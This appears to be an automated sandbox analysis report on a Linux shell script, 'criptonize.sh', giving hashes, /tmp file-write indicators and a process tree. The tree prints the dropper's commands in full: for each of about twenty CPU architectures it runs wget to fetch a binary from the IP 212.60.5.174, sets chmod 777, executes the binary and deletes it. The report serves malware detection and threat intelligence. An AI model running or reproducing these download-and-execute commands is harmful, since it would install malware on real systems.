Resubmissions
27-08-2024 23:50
240827-3vw9rsxdrg 8
27-08-2024 23:49
240827-3t1wkaxdpd 8
27-08-2024 23:47
240827-3svyxsxdlf 8
27-08-2024 23:45
240827-3rvlrsxdjc 3
Analysis
-
max time kernel
31s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240611-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
27-08-2024 23:45
Static task
static1
Behavioral task
behavioral1
Sample
criptonize.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
criptonize.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
criptonize.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
criptonize.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
criptonize.sh
-
Size
9KB
-
MD5
fe5b1cae588f9ad418e162262b65b865
-
SHA1
c0ab765270f811bcdbb0ad9f4ed2871edcf58caf
-
SHA256
5231c1a078c018a6abea6fadde67300a961c9b528743464806246a3be619b405
-
SHA512
b9c079cbb03cc31ba0163dbfe3d9a8fda594010717f48d29880496e31b3852fb90423e6291b1697e09c52d72f6bd1f4405021aa63d652a0c96853fff25055774
-
SSDEEP
96:rK7IcSgf29gv+1XVYmm6Wdw9Iu8f/s2CIjTgSWuI:cERlnySeZy
Malware Config
Signatures
-
Writes file to tmp directory (20 IoCs)
Malware often drops required files in the /tmp directory.
Description | IoC | Process
File opened for modification | /tmp/criptonize.x86_64 | wget
File opened for modification | /tmp/criptonize.i686 | wget
File opened for modification | /tmp/criptonize.i486 | wget
File opened for modification | /tmp/criptonize.armv4eb | wget
File opened for modification | /tmp/criptonize.arc700 | wget
File opened for modification | /tmp/criptonize.aarch64 | wget
File opened for modification | /tmp/criptonize.armv7l | wget
File opened for modification | /tmp/criptonize.powerpc | wget
File opened for modification | /tmp/criptonize.armv4l | wget
File opened for modification | /tmp/criptonize.mips64 | wget
File opened for modification | /tmp/criptonize.mipsel | wget
File opened for modification | /tmp/criptonize.bsdamd64 | wget
File opened for modification | /tmp/criptonize.m68k | wget
File opened for modification | /tmp/criptonize.sh4 | wget
File opened for modification | /tmp/criptonize.sparc | wget
File opened for modification | /tmp/criptonize.i586 | wget
File opened for modification | /tmp/criptonize.armv6l | wget
File opened for modification | /tmp/criptonize.armv5l | wget
File opened for modification | /tmp/criptonize.armv4tl | wget
File opened for modification | /tmp/criptonize.mips | wget
Processes
-
/tmp/criptonize.sh | /tmp/criptonize.sh | 1⤵ | PID:1478
/bin/rm | rm -f criptonize.x86_64 | 2⤵ | PID:1479
/usr/bin/wget | wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64 | 2⤵ | PID:1480
  - Writes file to tmp directory
/bin/chmod | chmod 777 criptonize.x86_64 | 2⤵ | PID:1493
/tmp/criptonize.x86_64 | ./criptonize.x86_64 x86_64 | 2⤵ | PID:1494
/bin/rm | rm -f criptonize.x86_64 | 2⤵ | PID:1495
/bin/rm | rm -f criptonize.i686 | 2⤵ | PID:1496
/usr/bin/wget | wget -O criptonize.i686 http://212.60.5.174/criptonize.i686 | 2⤵ | PID:1497
  - Writes file to tmp directory
/bin/chmod | chmod 777 criptonize.i686 | 2⤵ | PID:1498
/tmp/criptonize.i686 | ./criptonize.i686 i686 | 2⤵ | PID:1499
/bin/rm | rm -f criptonize.i686 | 2⤵ | PID:1500
/bin/rm | rm -f criptonize.i586 | 2⤵ | PID:1501
/usr/bin/wget | wget -O criptonize.i586 http://212.60.5.174/criptonize.i586 | 2⤵ | PID:1502
  - Writes file to tmp directory
/bin/chmod | chmod 777 criptonize.i586 | 2⤵ | PID:1503
/tmp/criptonize.i586 | ./criptonize.i586 i586 | 2⤵ | PID:1504
/bin/rm | rm -f criptonize.i586 | 2⤵ | PID:1505
/bin/rm | rm -f criptonize.i486 | 2⤵ | PID:1506
/usr/bin/wget | wget -O criptonize.i486 http://212.60.5.174/criptonize.i486 | 2⤵ | PID:1507
  - Writes file to tmp directory
/bin/chmod | chmod 777 criptonize.i486 | 2⤵ | PID:1508
/tmp/criptonize.i486 | ./criptonize.i486 i486 | 2⤵ | PID:1509
/bin/rm | rm -f criptonize.i486 | 2⤵ | PID:1510
/bin/rm | rm -f criptonize.aarch64 | 2⤵ | PID:1511
/usr/bin/wget | wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64 | 2⤵ | PID:1512
  - Writes file to tmp directory
/bin/chmod | chmod 777 criptonize.aarch64 | 2⤵ | PID:1513
/tmp/criptonize.aarch64 | ./criptonize.aarch64 aarch64 | 2⤵ | PID:1514
/bin/rm | rm -f criptonize.aarch64 | 2⤵ | PID:1516
/bin/rm | rm -f criptonize.armv7l | 2⤵ | PID:1517
/usr/bin/wget | wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l | 2⤵ | PID:1518
  - Writes file to tmp directory
/bin/chmod | chmod 777 criptonize.armv7l | 2⤵ | PID:1519
/tmp/criptonize.armv7l | ./criptonize.armv7l armv7l | 2⤵ | PID:1520
/bin/rm | rm -f criptonize.armv7l | 2⤵ | PID:1522
/bin/rm | rm -f criptonize.armv6l | 2⤵ | PID:1523
/usr/bin/wget | wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l | 2⤵ | PID:1524
  - Writes file to tmp directory
/bin/chmod | chmod 777 criptonize.armv6l | 2⤵ | PID:1525
/tmp/criptonize.armv6l | ./criptonize.armv6l armv6l | 2⤵ | PID:1526
/bin/rm | rm -f criptonize.armv6l | 2⤵ | PID:1528
/bin/rm | rm -f criptonize.armv5l | 2⤵ | PID:1529
/usr/bin/wget | wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l | 2⤵ | PID:1530
  - Writes file to tmp directory
/bin/chmod | chmod 777 criptonize.armv5l | 2⤵ | PID:1531
/tmp/criptonize.armv5l | ./criptonize.armv5l armv5l | 2⤵ | PID:1532
/bin/rm | rm -f criptonize.armv5l | 2⤵ | PID:1534
/bin/rm | rm -f criptonize.armv4eb | 2⤵ | PID:1535
/usr/bin/wget | wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb | 2⤵ | PID:1536
  - Writes file to tmp directory
/bin/chmod | chmod 777 criptonize.armv4eb | 2⤵ | PID:1537
/tmp/criptonize.armv4eb | ./criptonize.armv4eb armv4eb | 2⤵ | PID:1538
/bin/rm | rm -f criptonize.armv4eb | 2⤵ | PID:1540
/bin/rm | rm -f criptonize.armv4tl | 2⤵ | PID:1541
/usr/bin/wget | wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl | 2⤵ | PID:1542
  - Writes file to tmp directory
/bin/chmod | chmod 777 criptonize.armv4tl | 2⤵ | PID:1543
/tmp/criptonize.armv4tl | ./criptonize.armv4tl armv4tl | 2⤵ | PID:1544
/bin/rm | rm -f criptonize.armv4tl | 2⤵ | PID:1546
/bin/rm | rm -f criptonize.armv4l | 2⤵ | PID:1547
/usr/bin/wget | wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l | 2⤵ | PID:1548
  - Writes file to tmp directory
/bin/chmod | chmod 777 criptonize.armv4l | 2⤵ | PID:1549
/tmp/criptonize.armv4l | ./criptonize.armv4l armv4l | 2⤵ | PID:1550
/bin/rm | rm -f criptonize.armv4l | 2⤵ | PID:1552
/bin/rm | rm -f criptonize.mips64 | 2⤵ | PID:1553
/usr/bin/wget | wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64 | 2⤵ | PID:1554
  - Writes file to tmp directory
/bin/chmod | chmod 777 criptonize.mips64 | 2⤵ | PID:1555
/tmp/criptonize.mips64 | ./criptonize.mips64 mips64 | 2⤵ | PID:1556
/bin/rm | rm -f criptonize.mips64 | 2⤵ | PID:1558
/bin/rm | rm -f criptonize.mips | 2⤵ | PID:1559
/usr/bin/wget | wget -O criptonize.mips http://212.60.5.174/criptonize.mips | 2⤵ | PID:1560
  - Writes file to tmp directory
/bin/chmod | chmod 777 criptonize.mips | 2⤵ | PID:1561
/tmp/criptonize.mips | ./criptonize.mips mips | 2⤵ | PID:1562
/bin/rm | rm -f criptonize.mips | 2⤵ | PID:1564
/bin/rm | rm -f criptonize.mipsel | 2⤵ | PID:1565
/usr/bin/wget | wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel | 2⤵ | PID:1566
  - Writes file to tmp directory
/bin/chmod | chmod 777 criptonize.mipsel | 2⤵ | PID:1567
/tmp/criptonize.mipsel | ./criptonize.mipsel mipsel | 2⤵ | PID:1568
/bin/rm | rm -f criptonize.mipsel | 2⤵ | PID:1570
/bin/rm | rm -f criptonize.powerpc | 2⤵ | PID:1571
/usr/bin/wget | wget -O criptonize.powerpc http://212.60.5.174/criptonize.powerpc | 2⤵ | PID:1572
  - Writes file to tmp directory
/bin/chmod | chmod 777 criptonize.powerpc | 2⤵ | PID:1573
/tmp/criptonize.powerpc | ./criptonize.powerpc powerpc | 2⤵ | PID:1574
/bin/rm | rm -f criptonize.powerpc | 2⤵ | PID:1576
/bin/rm | rm -f criptonize.m68k | 2⤵ | PID:1577
/usr/bin/wget | wget -O criptonize.m68k http://212.60.5.174/criptonize.m68k | 2⤵ | PID:1578
  - Writes file to tmp directory
/bin/chmod | chmod 777 criptonize.m68k | 2⤵ | PID:1579
/tmp/criptonize.m68k | ./criptonize.m68k m68k | 2⤵ | PID:1580
/bin/rm | rm -f criptonize.m68k | 2⤵ | PID:1582
/bin/rm | rm -f criptonize.sh4 | 2⤵ | PID:1583
/usr/bin/wget | wget -O criptonize.sh4 http://212.60.5.174/criptonize.sh4 | 2⤵ | PID:1584
  - Writes file to tmp directory
/bin/chmod | chmod 777 criptonize.sh4 | 2⤵ | PID:1585
/tmp/criptonize.sh4 | ./criptonize.sh4 sh4 | 2⤵ | PID:1586
/bin/rm | rm -f criptonize.sh4 | 2⤵ | PID:1588
/bin/rm | rm -f criptonize.sparc | 2⤵ | PID:1589
/usr/bin/wget | wget -O criptonize.sparc http://212.60.5.174/criptonize.sparc | 2⤵ | PID:1590
  - Writes file to tmp directory
/bin/chmod | chmod 777 criptonize.sparc | 2⤵ | PID:1591
/tmp/criptonize.sparc | ./criptonize.sparc sparc | 2⤵ | PID:1592
/bin/rm | rm -f criptonize.sparc | 2⤵ | PID:1594
/bin/rm | rm -f criptonize.arc700 | 2⤵ | PID:1595
/usr/bin/wget | wget -O criptonize.arc700 http://212.60.5.174/criptonize.arc700 | 2⤵ | PID:1596
  - Writes file to tmp directory
/bin/chmod | chmod 777 criptonize.arc700 | 2⤵ | PID:1597
/tmp/criptonize.arc700 | ./criptonize.arc700 arc700 | 2⤵ | PID:1598
/bin/rm | rm -f criptonize.arc700 | 2⤵ | PID:1600
/bin/rm | rm -f criptonize.bsdamd64 | 2⤵ | PID:1601
/usr/bin/wget | wget -O criptonize.bsdamd64 http://212.60.5.174/criptonize.bsdamd64 | 2⤵ | PID:1602
  - Writes file to tmp directory
/bin/chmod | chmod 777 criptonize.bsdamd64 | 2⤵ | PID:1605
/tmp/criptonize.bsdamd64 | ./criptonize.bsdamd64 bsdamd64 | 2⤵ | PID:1606
/bin/rm | rm -f criptonize.bsdamd64 | 2⤵ | PID:1608